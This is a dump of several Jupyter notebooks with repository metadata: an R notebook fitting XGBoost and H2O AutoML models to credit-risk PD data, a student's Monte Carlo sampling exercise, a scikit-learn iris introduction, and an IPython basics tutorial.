"par(mfrow=c(2,1))\nplot(ABT_train_AR$y_train_AR,predicted_train_AR,col='red',\n main='Real vs predicted XGBoost (train set) Delta-Logit AR',pch=18,cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual train values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGBoost_train',pch=18,col='red', bty='n')\nplot(ABT_test_AR$y_test_AR,predicted_test_AR,col='blue',\n main='Real vs predicted XGBoost (test set) Delta-Logit AR',pch=18, cex=0.7, ylab = \"XGBoost predicted\", xlab = \"actual test values\")\nabline(0,1,lwd=2)\nlegend('bottomright',legend='XGBoost_test',pch=18,col='blue', bty='n', cex=.95)",
"_____no_output_____"
],
[
"#End",
"_____no_output_____"
]
],
[
[
"# H2O",
"_____no_output_____"
],
[
"## The h2o package is a product offered by H2O.ai that contains a number of cutting edge machine learning algorithms, performance metrics, and auxiliary functions to make machine learning both powerful and easy. One of the main benefits of H2O is that it can be deployed on a cluster (this will not be discussed today). From the R perspective, there are four main uses:",
"_____no_output_____"
],
[
"1. Data Manipulation: Merging, grouping, pivoting, imputing, splitting into training/test/validation sets, etc.\n\n2. Machine Learning Algorithms: Very sophisiticated algorithms in both supervised and unsupervised categories. Supervised include deep learning (neural networks), random forest, generalized linear model, gradient boosting machine, naive bayes, stacked ensembles, and xgboost. Unsupervised include generalized low rank models, k-means and PCA. There’s also Word2vec for text analysis. The latest stable release also has AutoML: automatic machine learning, which is really cool as we’ll see in this post!\n\n3. Auxiliary ML Functionality Performance analysis and grid hyperparameter search\n\n4. Production, Map/Reduce and Cloud: Capabilities for productionizing into Java environments, cluster deployment with Hadoop / Spark (Sparkling Water), deploying in cloud environments (Azure, AWS, Databricks, etc)",
"_____no_output_____"
]
],
[
[
"ABT %>%\n ggplot(aes(Date, pre_44_CRPh_delta_LogitPD))+\n# Train Region\n annotate(\"text\", x = ymd(\"2008-12-01\"), y = 0.75,\n color = palette_light()[[1]], label = \"Train Region\")+\n# Validation Region\n geom_rect(xmin = as.numeric(ymd(\"2011-01-01\")), \n xmax = as.numeric(ymd(\"2013-12-31\")),\n ymin = -1, ymax = Inf, alpha = 0.02,\n fill = palette_light()[[3]])+\n annotate(\"text\", x = ymd(\"2012-06-01\"), y = 0.75,\n color = palette_light()[[1]], label = \"Validation\\n Region\")+\n# Test Region\n geom_rect(xmin = as.numeric(ymd(\"2014-01-01\")), \n xmax = as.numeric(ymd(\"2016-06-30\")),\n ymin = -1, ymax = Inf, alpha = 0.02,\n fill = palette_light()[[4]]) +\n annotate(\"text\", x = ymd(\"2015-03-31\"), y = 0.75,\n color = palette_light()[[1]], label = \"Test\\nRegion\") +\n# Data\n geom_line(col = palette_light()[1]) +\n geom_point(col = palette_light()[1]) +\n geom_ma(ma_fun = SMA, n = 4, size = 1) +\n# Aesthetics\n #theme_tq() +\n scale_x_date(date_breaks = \"1 year\", date_labels = \"%Y\") +\n labs(title = \"Delta Logit PD: 2007 Q3 through 2016 Q3\",\n subtitle = \"Train, Validation, and Test Sets Shown\") ",
"_____no_output_____"
],
[
"# Split into training, validation and test sets\ntrain_tbl <- ABT %>% filter(Date < \"2011-01-01\") %>% select(-contains(\"Date\"))\nvalid_tbl <- ABT %>% filter(Date > \"2010-01-01\" & Date < \"2014-01-01\")%>% select(-contains(\"Date\"))\ntest_tbl <- ABT %>% filter(Date > \"2014-01-01\")%>% select(-contains(\"Date\"))",
"_____no_output_____"
],
[
"test_tbl$pre_44_CRPh_delta_LogitPD",
"_____no_output_____"
],
[
"h2o.shutdown(prompt = TRUE)",
"_____no_output_____"
],
[
"h2o.init()",
"\nH2O is not running yet, starting it now...\n"
],
[
"# Convert to H2OFrame objects\ntrain_h2o <- as.h2o(train_tbl)\nvalid_h2o <- as.h2o(valid_tbl)\ntest_h2o <- as.h2o(test_tbl)",
" |======================================================================| 100%\n |======================================================================| 100%\n |======================================================================| 100%\n"
],
[
"# Set names for h2o\ny <- \"pre_44_CRPh_delta_LogitPD\"\nx <- setdiff(names(train_h2o), y)",
"_____no_output_____"
],
[
"#train_h2o$pre_44_CRPh_delta_LogitPD\ntrain_h2o\ntest_h2o\nvalid_h2o\n",
"_____no_output_____"
],
[
"# linear regression model used, but can use any model\nautoml_models_h2o <- h2o.automl(\n x = x, \n y = y, \n training_frame = train_h2o, \n validation_frame = valid_h2o, \n leaderboard_frame = test_h2o, \n max_runtime_secs = 10, \n stopping_metric = \"deviance\")",
" |======================================================================| 100%\n |======================================================================| 100%\n"
],
[
"# Extract leader model\nautoml_leader <- automl_models_h2o@leader",
"_____no_output_____"
],
[
"automl_leader",
"_____no_output_____"
],
[
"pred_h2o <- h2o.predict(automl_leader, newdata = test_h2o)",
" |======================================================================| 100%\n"
],
[
"print(\"Train_result\")\nh2o.performance(automl_leader)\nprint(\"Test_result\")\nh2o.performance(automl_leader, newdata = test_h2o)\n",
"[1] \"Train_result\"\n"
],
[
"fit = h2o.gbm(x = x, y = y, training_frame = train_h2o) #need at least 20 training examples...",
" |======================================================================| 100%\n"
],
[
"plot(fit)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e7082cdec0c0f85cfc50f746066051f19af37908 | 139,329 | ipynb | Jupyter Notebook | tutorial012exercise.ipynb | BryanMcSp/FDS-2022-Exercises | 22ffb9aa7c77452bb800e14112ec33d13214dcc1 | [
"MIT"
] | null | null | null | tutorial012exercise.ipynb | BryanMcSp/FDS-2022-Exercises | 22ffb9aa7c77452bb800e14112ec33d13214dcc1 | [
"MIT"
] | null | null | null | tutorial012exercise.ipynb | BryanMcSp/FDS-2022-Exercises | 22ffb9aa7c77452bb800e14112ec33d13214dcc1 | [
"MIT"
] | null | null | null | 177.263359 | 27,364 | 0.905727 | [
[
[
"# In-class exercise for tutorial012\n# Loops!",
"_____no_output_____"
],
[
"## Introduction",
"_____no_output_____"
],
[
"All of what we think of as \"statistics\" is based upon repeating an experiment an infinite number of times. But rather than actually repeating the experiment, a bunch of calculus is used, plus assumptions to get the math to work. It may not seem obvious, but when we have been doing something as simple as compute the width of a sampling distribution from a set of data as *s/sqrt(n)*, what we are really saying is:\n\n\"If we were to do this experiment an infinite number of times and make a distribution of the means from all the experiments, it would be a normal distribution and have a standard deviation of s/sqrt(n). (And, by the way, this formula is based on a bunch of math that we will never actually do!)\"",
"_____no_output_____"
],
[
"One of the most important breakthroughs in statistics and data science was the realization that, with the repetition of a few simple operations (using computers), we can actually simulate experiments a \"very large\" number of times. And while it's true that \"very large\" is less then infinite, by using computers to repeat experiments many many times (say tenths of thousands), we free ourselves of the assumptions that had to made in order to get the math underlying traditional statistics to work!",
"_____no_output_____"
],
[
"But how would we simulate repeating an experiment a number of times over in code?\n\nYou guessed it... **with a `for` loop!**",
"_____no_output_____"
],
[
"---",
"_____no_output_____"
],
[
"### Load the data set",
"_____no_output_____"
],
[
"The data come from an online test of anxiety that – according to the sketchy website – was constructed such that the anxiety scores are **normally distributed** with a **mean of 50** and a **standard deviation of 10**.",
"_____no_output_____"
],
[
"Preliminaries of course...",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt",
"_____no_output_____"
]
],
[
[
"Load the data file \"datasets/012_anxiety_data.npy\" (assuming you put the file in your \"datasets\" folder – otherwise adjust path as necessary. Reminder: `np.load()` is your friend!",
"_____no_output_____"
]
],
[
[
"df = np.load(\"datasets/012_anxiety_data.npy\")",
"_____no_output_____"
]
],
[
[
"Now let's make sure we know our data set, `real_data`, well. Let's \n\n* look at a histogram\n* ditto with a kde\n* compute the mean, median and standard deviation\n* compute the standard error of the mean\n",
"_____no_output_____"
]
],
[
[
"# histogram\nsns.displot(df, kind=\"hist\", bins = 15, alpha =0.3, color = \"red\", lw = 2)\n\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/3208310525.py:7: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
],
[
"# kde\nsns.kdeplot(df, fill = True, color = \"red\", lw = 3)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Proporition of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/1951504406.py:6: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
],
[
"# mean, median and standard deviation\nMean = round(np.mean(df))\nMedian = round(np.median(df))\nStd = round(np.std(df))\n\nprint(\"The mean is\", Mean, \"the median is\", Median, \"and the standard deviation is\", Std)",
"The mean is 61 the median is 61 and the standard deviation is 10\n"
],
[
"# standard error\nerror = np.std(df, ddof=1) / np.sqrt(np.size(df))\n\nprint(\"The standard error is\", error)",
"The standard error is 0.9839254370533779\n"
]
],
[
[
"---",
"_____no_output_____"
],
[
"In a sentence or two of your own words, describe what the standard error of the mean is:",
"_____no_output_____"
],
[
"### The standard error of the mean is essentially the estimated variability of your sample means in context of the population mean. So if it is around 1, then we expect that our mean is within one data point of the population mean. ",
"_____no_output_____"
],
[
"---",
"_____no_output_____"
],
[
"### Simulate a bunch of experimental replications",
"_____no_output_____"
],
[
"Imagine, we wanted to simulate many many repeates of the same experiments. Fpr examp,e imagine that we wanted to appreciate the variability of the data obtained in the experiments, under certain conditions of noise and variability in the data. \n\nHow would we simulate a bunch of experiments? We obviously can't actually repeat the experiments in the real world. But, as data scientists, we do have a couple of options, both of which we can implement with `for` loops!",
"_____no_output_____"
],
[
"#### Monte Carlo Simulation",
"_____no_output_____"
],
[
"If we want to repeat the experment a bunch of times, let's consider what we know! We know that the website claims that:\n\n* the scores are normally distributed\n* they have a mean of 50\n* and a standard deviation of 10\n\nSo we should be able to use `numpy.random.randn()` to generate numbers that meet the first critereon. Then we just have to scale the standard deviation up by 10 and set the mean to 50. Luckily, we know how to multiply (`*`) and add (`+`), respectively.\n\nSo here's our mission: \n\n* write a `for` loop that repeats `n_replications = 2000` times\n* on each replication\n - compute the mean of the simulated experiment\n - store that mean in a `mc_means` numpy array\n* do a histogram of the means\n* make a kde also too\n* compute the mean and standard deviation of the 2000 means\n - compare the \"mean o' means\" from your simulation with the data mean\n - compare the \"standard deviation o' means\" with the standard error of the data",
"_____no_output_____"
],
[
"The simulation via `for` loop:",
"_____no_output_____"
]
],
[
[
"#Array info\nnRows, nCols = 2000, 1\nmyArraysize = (nRows, nCols)\nmc_means = np.zeros(myArraysize)\n\n#Basic info about our sample\nnm = 50\nnsd = 10\nn = 2000\n\nfor i in range(n): \n sample_data = nm + nsd * np.random.randn(100,1)\n current_mean = np.mean(sample_data)\n mc_means[i] = current_mean\n \nmc_means.shape",
"_____no_output_____"
]
],
[
[
"Histogram of the means:",
"_____no_output_____"
]
],
[
[
"sns.displot(df, kind=\"hist\", bins = 15, alpha =0.3, color = \"green\", lw = 2)\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/120650702.py:4: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)\n"
]
],
[
[
"KDE of the means",
"_____no_output_____"
]
],
[
[
"sns.displot(df, kind=\"kde\", fill = True, color = \"green\", lw = 3)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/2506565030.py:5: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
]
],
[
[
"Compute the mean value of your simulation means:",
"_____no_output_____"
]
],
[
[
"sim_mean = np.mean(mc_means)\nsim_mean",
"_____no_output_____"
]
],
[
[
"Compare it with the original data mean:",
"_____no_output_____"
],
[
"### Our original data's mean was around 61, but our collection of 100 averages for 2000 samples per simulation yielded a mean of 50 (The expected mean). This seems to indicate that the claims made about the data used in the original website was signficantly flawed since it gave a mean plus 11 standard deviations (Using our calculated standard error). This seems to indicate that the mean from the population the sketchy website collected its data from is closer to 60 than the claimed mean of 50.",
"_____no_output_____"
],
[
"Compute the standard deviation of your simulation means:",
"_____no_output_____"
]
],
[
[
"np.std(mc_means)",
"_____no_output_____"
]
],
[
[
"Compare it with the standard error you computed from the original data:",
"_____no_output_____"
]
],
[
[
"error",
"_____no_output_____"
]
],
[
[
"### The standard error we initally calculated utilized the central limit theorem to approximate our standard error using the standard deviation divided by the square root of the sample size. This was essentially an estimate of what we calculated with our standard deviation of our sampling distribution. This finding supports the idea that the equation used to calculate standard error is a effective way to make an estimation about our population mean from the any sample data we use. ",
"_____no_output_____"
],
[
"##### Bonus (not required)\nIf you knocked the above out with time to spare – congratulations – and let's think about this: you not only have the information given above as clues to the true state of the world. You also have:\n\n* the data themselves (or the histogram thereof that you made)\n* the actual mean of the original data\n* the actual standard deviation of the original data\n\nSo rather than do a simulation based on the claimed mean of the sketchy website, you could base a new simulation on the data you actually have!\n\nNote that, if you wrote you code reasonably well above, you should only have to change the values of two variables to do this new simulation!\n\nProceed!",
"_____no_output_____"
]
],
[
[
"#Array info\nnRows, nCols = 2000, 1\nmyArraysize = (nRows, nCols)\nmc_means = np.zeros(myArraysize)\n\n#Basic info about our sample\nbonus_nm = 60\nbonus_sd = 10\nn = 2000\n\nfor i in range(n): \n sample_data = bonus_nm + bonus_sd * np.random.randn(100,1)\n current_mean = np.mean(sample_data)\n mc_means[i] = current_mean\n \nmc_means.shape",
"_____no_output_____"
],
[
"sns.displot(df, kind=\"hist\", bins = 10, alpha =0.3, color = \"orange\", lw = 2)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/1375256135.py:5: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\", Fontsize = 20)\n"
],
[
"sns.displot(df, kind=\"kde\", fill = True, color = \"orange\", lw = 3)\n\nplt.xlabel(\"Anxiety Score\")\nplt.ylabel(\"Count of Each Score\")\nplt.title(\"Distribution of Anxiety Scores\", \n Fontsize = 20)",
"/var/folders/zn/1ppzp1gs55l9qhhvv1n99m1c0000gn/T/ipykernel_5391/2823633410.py:5: MatplotlibDeprecationWarning: Case-insensitive properties were deprecated in 3.3 and support will be removed two minor releases later\n plt.title(\"Distribution of Anxiety Scores\",\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
]
] |
e708382ce3240109520e4b6277b8b8f63ad28538 | 237,206 | ipynb | Jupyter Notebook | notebooks/02.1-Machine-Learning-Intro.ipynb | ctpham/scikit-machinelearningtutorial | c7a24b9e6515650e3dc1a949fa070093269013ca | [
"BSD-3-Clause"
] | null | null | null | notebooks/02.1-Machine-Learning-Intro.ipynb | ctpham/scikit-machinelearningtutorial | c7a24b9e6515650e3dc1a949fa070093269013ca | [
"BSD-3-Clause"
] | null | null | null | notebooks/02.1-Machine-Learning-Intro.ipynb | ctpham/scikit-machinelearningtutorial | c7a24b9e6515650e3dc1a949fa070093269013ca | [
"BSD-3-Clause"
] | null | null | null | 673.880682 | 82,775 | 0.94033 | [
[
[
"<small><i>This notebook was put together by [Jake Vanderplas](http://www.vanderplas.com). Source and license info is on [GitHub](https://github.com/jakevdp/sklearn_tutorial/).</i></small>",
"_____no_output_____"
],
[
"# Introduction to Scikit-Learn: Machine Learning with Python\n\nThis session will cover the basics of Scikit-Learn, a popular package containing a collection of tools for machine learning written in Python. See more at http://scikit-learn.org.",
"_____no_output_____"
],
[
"## Outline\n\n**Main Goal:** To introduce the central concepts of machine learning, and how they can be applied in Python using the Scikit-learn Package.\n\n- Definition of machine learning\n- Data representation in scikit-learn\n- Introduction to the Scikit-learn API",
"_____no_output_____"
],
[
"## About Scikit-Learn\n\n[Scikit-Learn](http://github.com/scikit-learn/scikit-learn) is a Python package designed to give access to **well-known** machine learning algorithms within Python code, through a **clean, well-thought-out API**. It has been built by hundreds of contributors from around the world, and is used across industry and academia.\n\nScikit-Learn is built upon Python's [NumPy (Numerical Python)](http://numpy.org) and [SciPy (Scientific Python)](http://scipy.org) libraries, which enable efficient in-core numerical and scientific computation within Python. As such, scikit-learn is not specifically designed for extremely large datasets, though there is [some work](https://github.com/ogrisel/parallel_ml_tutorial) in this area.\n\nFor this short introduction, I'm going to stick to questions of in-core processing of small to medium datasets with Scikit-learn.",
"_____no_output_____"
],
[
"## What is Machine Learning?\n\nIn this section we will begin to explore the basic principles of machine learning.\nMachine Learning is about building programs with **tunable parameters** (typically an\narray of floating point values) that are adjusted automatically so as to improve\ntheir behavior by **adapting to previously seen data.**\n\nMachine Learning can be considered a subfield of **Artificial Intelligence** since those\nalgorithms can be seen as building blocks to make computers learn to behave more\nintelligently by somehow **generalizing** rather that just storing and retrieving data items\nlike a database system would do.\n\nWe'll take a look at two very simple machine learning tasks here.\nThe first is a **classification** task: the figure shows a\ncollection of two-dimensional data, colored according to two different class\nlabels. A classification algorithm may be used to draw a dividing boundary\nbetween the two clusters of points:",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport matplotlib.pyplot as plt\n\nplt.style.use('seaborn')",
"_____no_output_____"
],
[
"# Import the example plot from the figures directory\nfrom fig_code import plot_sgd_separator\nplot_sgd_separator()",
"_____no_output_____"
]
],
[
[
"This may seem like a trivial task, but it is a simple version of a very important concept.\nBy drawing this separating line, we have learned a model which can **generalize** to new\ndata: if you were to drop another point onto the plane which is unlabeled, this algorithm\ncould now **predict** whether it's a blue or a red point.\n\nIf you'd like to see the source code used to generate this, you can either open the\ncode in the `figures` directory, or you can load the code using the `%load` magic command:",
"_____no_output_____"
],
[
"The next simple task we'll look at is a **regression** task: a simple best-fit line\nto a set of data:",
"_____no_output_____"
]
],
[
[
"from fig_code import plot_linear_regression\nplot_linear_regression()",
"_____no_output_____"
]
],
[
[
"Again, this is an example of fitting a model to data, such that the model can make\ngeneralizations about new data. The model has been **learned** from the training\ndata, and can be used to predict the result of test data:\nhere, we might be given an x-value, and the model would\nallow us to predict the y value. Again, this might seem like a trivial problem,\nbut it is a basic example of a type of operation that is fundamental to\nmachine learning tasks.",
"_____no_output_____"
],
[
"## Representation of Data in Scikit-learn\n\nMachine learning is about creating models from data: for that reason, we'll start by\ndiscussing how data can be represented in order to be understood by the computer. Along\nwith this, we'll build on our matplotlib examples from the previous section and show some\nexamples of how to visualize data.",
"_____no_output_____"
],
[
"Most machine learning algorithms implemented in scikit-learn expect data to be stored in a\n**two-dimensional array or matrix**. The arrays can be\neither ``numpy`` arrays, or in some cases ``scipy.sparse`` matrices.\nThe size of the array is expected to be `[n_samples, n_features]`\n\n- **n_samples:** The number of samples: each sample is an item to process (e.g. classify).\n A sample can be a document, a picture, a sound, a video, an astronomical object,\n a row in database or CSV file,\n or whatever you can describe with a fixed set of quantitative traits.\n- **n_features:** The number of features or distinct traits that can be used to describe each\n item in a quantitative manner. Features are generally real-valued, but may be boolean or\n discrete-valued in some cases.\n\nThe number of features must be fixed in advance. However it can be very high dimensional\n(e.g. millions of features) with most of them being zeros for a given sample. This is a case\nwhere `scipy.sparse` matrices can be useful, in that they are\nmuch more memory-efficient than numpy arrays.",
"_____no_output_____"
],
[
"\n\n(Figure from the [Python Data Science Handbook](https://github.com/jakevdp/PythonDataScienceHandbook))",
"_____no_output_____"
],
[
"## A Simple Example: the Iris Dataset\n\nAs an example of a simple dataset, we're going to take a look at the\niris data stored by scikit-learn.\nThe data consists of measurements of three different species of irises.\nThere are three species of iris in the dataset, which we can picture here:",
"_____no_output_____"
]
],
[
[
"from IPython.core.display import Image, display\ndisplay(Image(filename='images/iris_setosa.jpg'))\nprint(\"Iris Setosa\\n\")\n\ndisplay(Image(filename='images/iris_versicolor.jpg'))\nprint(\"Iris Versicolor\\n\")\n\ndisplay(Image(filename='images/iris_virginica.jpg'))\nprint(\"Iris Virginica\")",
"_____no_output_____"
]
],
[
[
"### Quick Question:\n\n**If we want to design an algorithm to recognize iris species, what might the data be?**\n\nRemember: we need a 2D array of size `[n_samples x n_features]`.\n\n- What would the `n_samples` refer to?\n\n- What might the `n_features` refer to?\n\nRemember that there must be a **fixed** number of features for each sample, and feature\nnumber ``i`` must be a similar kind of quantity for each sample.",
"_____no_output_____"
],
[
"### Loading the Iris Data with Scikit-Learn\n\nScikit-learn has a very straightforward set of data on these iris species. The data consist of\nthe following:\n\n- Features in the Iris dataset:\n\n 1. sepal length in cm\n 2. sepal width in cm\n 3. petal length in cm\n 4. petal width in cm\n\n- Target classes to predict:\n\n 1. Iris Setosa\n 2. Iris Versicolour\n 3. Iris Virginica\n \n``scikit-learn`` embeds a copy of the iris CSV file along with a helper function to load it into numpy arrays:",
"_____no_output_____"
]
],
[
[
"from sklearn.datasets import load_iris\niris = load_iris()",
"_____no_output_____"
],
[
"iris.keys()",
"_____no_output_____"
],
[
"n_samples, n_features = iris.data.shape\nprint((n_samples, n_features))\nprint(iris.data[0])",
"(150, 4)\n[5.1 3.5 1.4 0.2]\n"
],
[
"print(iris.data.shape)\nprint(iris.target.shape)",
"(150, 4)\n(150,)\n"
],
[
"print(iris.target)",
"[0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0\n 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1\n 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 2 2 2\n 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2 2\n 2 2]\n"
],
[
"print(iris.target_names)",
"['setosa' 'versicolor' 'virginica']\n"
]
],
[
[
"This data is four dimensional, but we can visualize two of the dimensions\nat a time using a simple scatter-plot:",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\n\nx_index = 0\ny_index = 2\n\n# this formatter will label the colorbar with the correct target names\nformatter = plt.FuncFormatter(lambda i, *args: iris.target_names[int(i)])\n\nplt.scatter(iris.data[:, x_index], iris.data[:, y_index],\n c=iris.target, cmap=plt.cm.get_cmap('RdYlBu', 3))\nplt.colorbar(ticks=[0, 1, 2], format=formatter)\nplt.clim(-0.5, 2.5)\nplt.xlabel(iris.feature_names[x_index])\nplt.ylabel(iris.feature_names[y_index]);",
"_____no_output_____"
]
],
[
[
"### Quick Exercise:\n\n**Change** `x_index` **and** `y_index` **in the above script\nand find a combination of two parameters\nwhich maximally separate the three classes.**\n\nThis exercise is a preview of **dimensionality reduction**, which we'll see later.",
"_____no_output_____"
],
[
"## Other Available Data\nThey come in three flavors:\n\n- **Packaged Data:** these small datasets are packaged with the scikit-learn installation,\n and can be downloaded using the tools in ``sklearn.datasets.load_*``\n- **Downloadable Data:** these larger datasets are available for download, and scikit-learn\n includes tools which streamline this process. These tools can be found in\n ``sklearn.datasets.fetch_*``\n- **Generated Data:** there are several datasets which are generated from models based on a\n random seed. These are available in the ``sklearn.datasets.make_*``\n\nYou can explore the available dataset loaders, fetchers, and generators using IPython's\ntab-completion functionality. After importing the ``datasets`` submodule from ``sklearn``,\ntype\n\n datasets.load_ + TAB\n\nor\n\n datasets.fetch_ + TAB\n\nor\n\n datasets.make_ + TAB\n\nto see a list of available functions.",
"_____no_output_____"
]
],
[
[
"from sklearn import datasets",
"_____no_output_____"
],
[
"# Type datasets.fetch_<TAB> or datasets.load_<TAB> in IPython to see all possibilities\n\n datasets.fetch_california_housing",
"_____no_output_____"
],
[
" datasets.load_",
"_____no_output_____"
]
],
[
[
"In the next section, we'll use some of these datasets and take a look at the basic principles of machine learning.",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
e7087077b09e6e93c3c4f421954c39c3ff64e6ac | 60,378 | ipynb | Jupyter Notebook | 3-IPython.ipynb | lheagy/leads-intro-jupyter | 7898d8dd4f11935b9762f7f374cea3fdc850fd28 | [
"MIT"
] | null | null | null | 3-IPython.ipynb | lheagy/leads-intro-jupyter | 7898d8dd4f11935b9762f7f374cea3fdc850fd28 | [
"MIT"
] | null | null | null | 3-IPython.ipynb | lheagy/leads-intro-jupyter | 7898d8dd4f11935b9762f7f374cea3fdc850fd28 | [
"MIT"
] | null | null | null | 38.853282 | 551 | 0.555418 | [
[
[
"# IPython: beyond plain Python\n\nAdapted from the ICESat2 Hackweek [intro-jupyter-git](https://github.com/ICESAT-2HackWeek/intro-jupyter-git) session. Courtesy of [@fperez](https://github.com/fperez).\n\nWhen executing code in IPython, all valid Python syntax works as-is, but IPython provides a number of features designed to make the interactive experience more fluid and efficient.",
"_____no_output_____"
],
[
"## First things first: running code, getting help\n\nIn the notebook, to run a cell of code, hit `Shift-Enter`. This executes the cell and puts the cursor in the next cell below, or makes a new one if you are at the end. Alternately, you can use:\n \n- `Alt-Enter` to force the creation of a new cell unconditionally (useful when inserting new content in the middle of an existing notebook).\n- `Control-Enter` executes the cell and keeps the cursor in the same cell, useful for quick experimentation of snippets that you don't need to keep permanently.",
"_____no_output_____"
]
],
[
[
"print(\"Hi\")",
"Hi\n"
]
],
[
[
"Getting help:",
"_____no_output_____"
]
],
[
[
"?",
"_____no_output_____"
]
],
[
[
"Typing `object_name?` will print all sorts of details about any object, including docstrings, function definition lines (for call arguments) and constructor details for classes.",
"_____no_output_____"
]
],
[
[
"import numpy as np\nnp.linspace?",
"_____no_output_____"
],
[
"np.isclose??",
"_____no_output_____"
],
[
"*int*?",
"_____no_output_____"
]
],
[
[
"An IPython quick reference card:",
"_____no_output_____"
]
],
[
[
"%quickref",
"_____no_output_____"
]
],
[
[
"## Tab completion\n\nTab completion, especially for attributes, is a convenient way to explore the structure of any object you’re dealing with. Simply type `object_name.<TAB>` to view the object’s attributes. Besides Python objects and keywords, tab completion also works on file and directory names.",
"_____no_output_____"
]
],
[
[
"np.",
"_____no_output_____"
]
],
[
[
"## The interactive workflow: input, output, history",
"_____no_output_____"
]
],
[
[
"2+10",
"_____no_output_____"
],
[
"_+10",
"_____no_output_____"
]
],
[
[
